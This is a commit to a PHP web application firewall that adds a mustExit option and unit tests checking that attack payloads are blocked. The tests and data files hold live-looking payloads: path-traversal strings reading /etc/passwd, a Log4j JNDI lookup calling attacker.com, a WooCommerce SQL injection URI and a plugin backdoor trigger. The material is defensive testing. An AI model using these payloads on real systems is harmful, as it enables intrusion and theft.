Some minor core engine changes. Added a bunch of tests to test different XSS, SQLI, LFI and WordPress specific payloads.

dave83649 · dave83649 · commit de6071e4a77e · 2022-03-28T16:53:56.000+02:00
diff --git a/src/Processor.php b/src/Processor.php
@@ -188,10 +188,11 @@ public function launch()
 
 	/**
 	 * The legacy firewall processor will only iterate over the general firewall rules.
+	 * Returns true if all rules were passed. False if any rule was hit.
 	 * 
 	 * @return boolean
 	 */
-	public function legacyProcessor()
+	public function legacyProcessor($mustExit = true)
 	{
 		// Obtain the IP address and request data.
 		$client_ip = $this->extension->getIpAddress();
@@ -266,13 +267,18 @@ function ($o, $p) {
 			if ($blocked_count >= $count_rules) {
 				if ($rule_terms->type == 'BLOCK') {
 					$this->extension->logRequest($firewall_rule['id'], $request, 'BLOCK');
-					$this->extension->forceExit($firewall_rule['id']);
+					
+					// Do we have to exit the page or simply return false?
+					if($mustExit){
+						$this->extension->forceExit($firewall_rule['id']);
+					}else{
+						return false;
+					}
 				} elseif ($rule_terms->type == 'LOG') {
 					$this->extension->logRequest($firewall_rule['id'], $request, 'LOG');
 				} elseif ($rule_terms->type == 'REDIRECT') {
 					$this->extension->logRequest($firewall_rule['id'], $request, 'REDIRECT');
-					$this->response->redirect($rule_terms->type_params);
-					exit;
+					$this->response->redirect($rule_terms->type_params, $mustExit);
 				}
 			}
 		}
diff --git a/src/Response.php b/src/Response.php
@@ -24,12 +24,12 @@ public function __construct($options = array())
 
     /**
      * Perform a redirect if the request must be redirected to somewhere else.
-     * The caller should exit the script.
      * 
      * @param string $redirectTo
+     * @param boolean $mustExit
      * @return void
      */
-    public function redirect($redirectTo)
+    public function redirect($redirectTo = '', $mustExit = true)
     {
         // Don't redirect an invalid URL.
         if (!$redirectTo || filter_var($redirectTo, FILTER_VALIDATE_URL) === false) {
@@ -38,5 +38,10 @@ public function redirect($redirectTo)
 
         // Perform the redirect.
         header('Location: ' . $redirectTo, true, 302);
+
+        // In some scenarios we might want to control if the script should exit executing.
+        if ($mustExit) {
+            exit;
+        }
     }
 }
diff --git a/tests/FirewallLegacyTest.php b/tests/FirewallLegacyTest.php
@@ -1,6 +1,5 @@
 <?php declare(strict_types=1);
 use PHPUnit\Framework\TestCase;
-
 use Patchstack\Processor;
 use Patchstack\Extensions\Test\Extension;
 
@@ -18,6 +17,8 @@ final class FirewallLegacyTest extends TestCase
 
     /**
      * Setup the test for testing the header location redirect.
+     * 
+     * @return void
      */
     protected function setUp(): void
     {
@@ -28,6 +29,7 @@ protected function setUp(): void
      * Setup the firewall processor.
      * 
      * @param array $rules
+     * @return void
      */
     private function setUpFirewallProcessor(array $rules)
     {
@@ -41,8 +43,12 @@ private function setUpFirewallProcessor(array $rules)
 
     /**
      * Alters the payload between tests.
+     * For most firewall rules there's no difference if testing against GET or POST.
+     * Therefore, both can be used for testing payloads.
+     * 
+     * @return void
      */
-    private function alterPayload(array $payload)
+    private function alterPayload(array $payload = [])
     {
         $_POST = [];
         $_GET = [];
@@ -53,6 +59,8 @@ private function alterPayload(array $payload)
 
     /**
      * Testing all firewall rules with no payload should result nothing.
+     * 
+     * @return void
      */
     public function testAllRules()
     {
@@ -62,16 +70,109 @@ public function testAllRules()
 
     /**
      * Test different cross-site scripting attacks.
+     * 
+     * @return void
      */
     public function testXSS()
     {
         $this->setUpFirewallProcessor($this->rules);
 
-        // Basic JavaScript alert through a GET parameter.
+        // Load list of about 1000 XSS payloads.
+        $payloads = file_get_contents(dirname(__FILE__) . '/data/PayloadsXSS.txt');
+        $payloads = explode("\n", $payloads);
+        foreach($payloads as $payload){
+            if(trim($payload) == ''){
+                continue;
+            }
+
+            $this->alterPayload(['GET' => [
+                'q' => $payload
+            ]]);
+            $this->assertFalse($this->processor->legacyProcessor(false), 'Testing XSS failed with payload: ' . $payload);
+        }
+    }
+
+    /**
+     * Test different SQL injection attacks.
+     * 
+     * @return void
+     */
+    public function testSQLI()
+    {
+        $this->setUpFirewallProcessor($this->rules);
+
+        // Load list of about 1000 XSS payloads.
+        $payloads = file_get_contents(dirname(__FILE__) . '/data/PayloadsSQLI.txt');
+        $payloads = explode("\n", $payloads);
+        foreach($payloads as $payload){
+            if(trim($payload) == ''){
+                continue;
+            }
+
+            $this->alterPayload(['GET' => [
+                'q' => $payload
+            ]]);
+            $this->assertFalse($this->processor->legacyProcessor(false), 'Testing SQLI failed with payload: ' . $payload);
+        }
+    }
+
+    /**
+     * Test different local file inclusion attacks.
+     * 
+     * @return void
+     */
+    public function testLFI()
+    {
+        $this->setUpFirewallProcessor($this->rules);
+
+        // Load list of about 1000 XSS payloads.
+        $payloads = file_get_contents(dirname(__FILE__) . '/data/PayloadsLFI.txt');
+        $payloads = explode("\n", $payloads);
+        foreach($payloads as $payload){
+            if(trim($payload) == ''){
+                continue;
+            }
+
+            $this->alterPayload(['GET' => [
+                'q' => $payload
+            ]]);
+            $this->assertFalse($this->processor->legacyProcessor(false), 'Testing LFI failed with payload: ' . $payload);
+        }
+    }
+
+    /**
+     * Test different WordPress specific attacks.
+     * 
+     * @return void
+     */
+    public function testWordPressSpecific()
+    {
+        $this->setUpFirewallProcessor($this->rules);
+
+        // Block Freemius vulnerability through action method.
         $this->alterPayload(['GET' => [
-            'q' => '<script>alert(1)</script>'
+            'action' => 'fs_retry_connectivity_test_'
         ]]);
-        $this->processor->legacyProcessor();
+        $this->assertFalse($this->processor->legacyProcessor(false));
+
+        // Block AccessPress backdoor through user-agent.
+        $_SERVER['HTTP_USER_AGENT'] = 'wp_is_mobile';
+        $this->alterPayload();
+        $this->assertFalse($this->processor->legacyProcessor(false));
+        $_SERVER['HTTP_USER_AGENT'] = '';
+        
+        // Block Apache Log4j vulnerability.
+        $this->alterPayload([
+            'GET' => [
+                'q' => '${jndi:ldap://attacker.com/reference}'
+            ]
+        ]);
+        $this->assertFalse($this->processor->legacyProcessor(false));
 
+        // Block WooCommerce SQL injection.
+        $this->alterPayload();
+        $_SERVER['REQUEST_URI'] = '/wp-json/wc/store/products/collection-data?calculate_attribute_counts\[\]\[query_type\]=and&calculate_attribute_counts\[\]\[taxonomy\]=poc%252522%252529%252520OR%252520SLEEP%2525281%252529%252523';
+        $this->assertFalse($this->processor->legacyProcessor(false));
+        $_SERVER['REQUEST_URI'] = '';
     }
 }
diff --git a/tests/ResponseTest.php b/tests/ResponseTest.php
@@ -8,6 +8,8 @@ final class ResponseTest extends TestCase
 
     /**
      * Setup the test for testing the header location redirect.
+     * 
+     * @return void
      */
     protected function setUp(): void
     {
@@ -22,23 +24,25 @@ protected function setUp(): void
 
     /**
      * Test a redirect with a valid URL.
+     * 
+     * @return void
      */
     public function testRedirectSuccess()
     {
         try {
-            $this->app->redirect('https://www.amazon.com');
+            $this->app->redirect('https://www.amazon.com', true);
         } catch(\Exception $e) {
             $this->assertEquals($e->getMessage(), 'https://www.amazon.com');
         }
 
         try {
-            $this->app->redirect('https://www.google.com');
+            $this->app->redirect('https://www.google.com', true);
         } catch(\Exception $e) {
             $this->assertEquals($e->getMessage(), 'https://www.google.com');
         }
 
         try {
-            $this->app->redirect('https://1.1.1.1');
+            $this->app->redirect('https://1.1.1.1', true);
         } catch(\Exception $e) {
             $this->assertEquals($e->getMessage(), 'https://1.1.1.1');
         }
@@ -47,15 +51,17 @@ public function testRedirectSuccess()
     /**
      * Test a redirect which has an invalid URL.
      * Since users can supply this redirect URL, we'd want to check it on the client side too.
+     * 
+     * @return void
      */
     public function testRedirectFailure()
     {
         $response = new Response();
 
-        $this->assertEquals($response->redirect('https//patchstack.com'), false);
-        $this->assertEquals($response->redirect('https:/patchstackcom'), false);
-        $this->assertEquals($response->redirect('$TOJ34r8tq94ht'), false);
-        $this->assertEquals($response->redirect('123.123.123'), false);
-        $this->assertEquals($response->redirect(' '), false);
+        $this->assertEquals($response->redirect('https//patchstack.com', true), false);
+        $this->assertEquals($response->redirect('https:/patchstackcom', true), false);
+        $this->assertEquals($response->redirect('$TOJ34r8tq94ht', true), false);
+        $this->assertEquals($response->redirect('123.123.123', true), false);
+        $this->assertEquals($response->redirect(' ', true), false);
     }
 }
diff --git a/tests/data/PayloadsLFI.txt b/tests/data/PayloadsLFI.txt
@@ -0,0 +1,8 @@
+utils/scripts/../../../../../etc/passwd
+a/../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\.\.
+a/../../../../../../../../../etc/passwd/./././././.
+....//....//etc/passwd
+..///////..////..//////etc/passwd
+/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
+/var/www/../../etc/passwd
+../../etc/passwd
diff --git a/tests/data/PayloadsSQLI.txt b/tests/data/PayloadsSQLI.txt
diff --git a/tests/data/PayloadsXSS.txt b/tests/data/PayloadsXSS.txt

Original file line number	Diff line number	Diff line change
`@@ -24,12 +24,12 @@ public function __construct($options = array())`
`24`	`24`
`25`	`25`	`/**`
`26`	`26`	`* Perform a redirect if the request must be redirected to somewhere else.`
`27`		`- * The caller should exit the script.`
`28`	`27`	`*`
`29`	`28`	`* @param string $redirectTo`
	`29`	`+ * @param boolean $mustExit`
`30`	`30`	`* @return void`
`31`	`31`	`*/`
`32`		`- public function redirect($redirectTo)`
	`32`	`+ public function redirect($redirectTo = '', $mustExit = true)`
`33`	`33`	`{`
`34`	`34`	`// Don't redirect an invalid URL.`
`35`	`35`	`if (!$redirectTo \|\| filter_var($redirectTo, FILTER_VALIDATE_URL) === false) {`
`@@ -38,5 +38,10 @@ public function redirect($redirectTo)`
`38`	`38`
`39`	`39`	`// Perform the redirect.`
`40`	`40`	`header('Location: ' . $redirectTo, true, 302);`
	`41`	`+`
	`42`	`+ // In some scenarios we might want to control if the script should exit executing.`
	`43`	`+ if ($mustExit) {`
	`44`	`+ exit;`
	`45`	`+ }`
`41`	`46`	`}`
`42`	`47`	`}`